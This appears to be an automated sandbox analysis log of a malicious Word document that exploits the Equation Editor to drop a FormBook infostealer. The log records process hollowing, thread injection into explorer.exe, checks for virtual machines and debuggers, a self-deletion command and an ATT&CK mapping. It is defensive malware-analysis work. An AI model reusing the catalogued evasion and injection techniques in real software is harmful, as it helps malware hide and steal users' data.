        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exeJump to behavior
        Source: C:\Users\Public\69577.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\69577.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
        Source: IMG-50230.docStatic file information: File size 1332844 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe
        Source: Binary string: wntdll.pdb source: AddInProcess32.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: AddInProcess32.exe, 00000005.00000002.2140415734.00000000001C4000.00000004.00000020.sdmp
        Source: C:\Users\Public\69577.exeCode function: 4_2_00838556 push esi; ret 4_2_0083855C
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC05E6 pushfd ; iretd 4_2_01FC0613
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC4B71 push es; iretd 4_2_01FC5094
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC4E9A push es; iretd 4_2_01FC5094
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC0A2A push ds; ret 4_2_01FC0A51
        Source: C:\Users\Public\69577.exeCode function: 4_2_003ACDF4 push ecx; retf 4_2_003ACDF5
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00812050 push es; ret 5_2_0081250A
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D095 push eax; ret 5_2_0009D0E8
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D0EB push eax; ret 5_2_0009D152
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D0E2 push eax; ret 5_2_0009D0E8
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D90D push ebx; retf 5_2_0009D90F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D14C push eax; ret 5_2_0009D152
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009653F push cs; iretd 5_2_0009654E
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009771B push eax; retf 5_2_00097732
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_000967E9 push ebx; ret 5_2_000967F3
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084DFA1 push ecx; ret 5_2_0084DFB4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265DFA1 push ecx; ret 7_2_0265DFB4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED095 push eax; ret 7_2_000ED0E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED0EB push eax; ret 7_2_000ED152
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED0E2 push eax; ret 7_2_000ED0E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED14C push eax; ret 7_2_000ED152
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E653F push cs; iretd 7_2_000E654E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E771B push eax; retf 7_2_000E7732
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E67E9 push ebx; ret 7_2_000E67F3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED90D push ebx; retf 7_2_000ED90F
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJump to dropped file
        Source: C:\Users\Public\69577.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\Public\69577.exeFile opened: C:\Users\Public\69577.exe\:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\Public\69577.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM_3Show sources
        Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2536, type: MEMORY
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D98E4 second address: 00000000000D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D9B5E second address: 00000000000D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089A90 rdtsc 5_2_00089A90
        Source: C:\Users\Public\69577.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2332Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\Public\69577.exe TID: 2372Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\Public\69577.exe TID: 2728Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Users\Public\69577.exe TID: 2696Thread sleep count: 197 > 30Jump to behavior
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: VMware
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmware svga
        Source: explorer.exe, 00000006.00000002.2360960518.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000006.00000000.2118650241.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: explorer.exe, 00000006.00000000.2118741780.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmusrvc
        Source: explorer.exe, 00000006.00000000.2118547561.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmsrvc
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmtools
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
        Source: explorer.exe, 00000006.00000002.2361009876.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
        Source: C:\Users\Public\69577.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089A90 rdtsc 5_2_00089A90
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0008ACD0 LdrLoadDll,5_2_0008ACD0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h]5_2_008526F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026626F8 mov eax, dword ptr fs:[00000030h]7_2_026626F8
        Source: C:\Users\Public\69577.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\Public\69577.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\Public\69577.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 80000 protect: page execute and read and writeJump to behavior
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 80000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 1388Jump to behavior
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 350000Jump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 80000Jump to behavior
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 81000Jump to behavior
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 7EFDE008Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exeJump to behavior
        Source: C:\Users\Public\69577.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
        Source: explorer.exe, 00000006.00000002.2361185402.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 00000006.00000002.2361185402.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000006.00000002.2360960518.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000006.00000002.2361185402.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: C:\Users\Public\69577.exeQueries volume information: C:\Users\Public\69577.exe VolumeInformationJump to behavior
        Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Spearphishing Link1Shared Modules1Valid Accounts1Valid Accounts1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Valid Accounts1Exploitation for Client Execution13Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery113Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Process Injection712Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
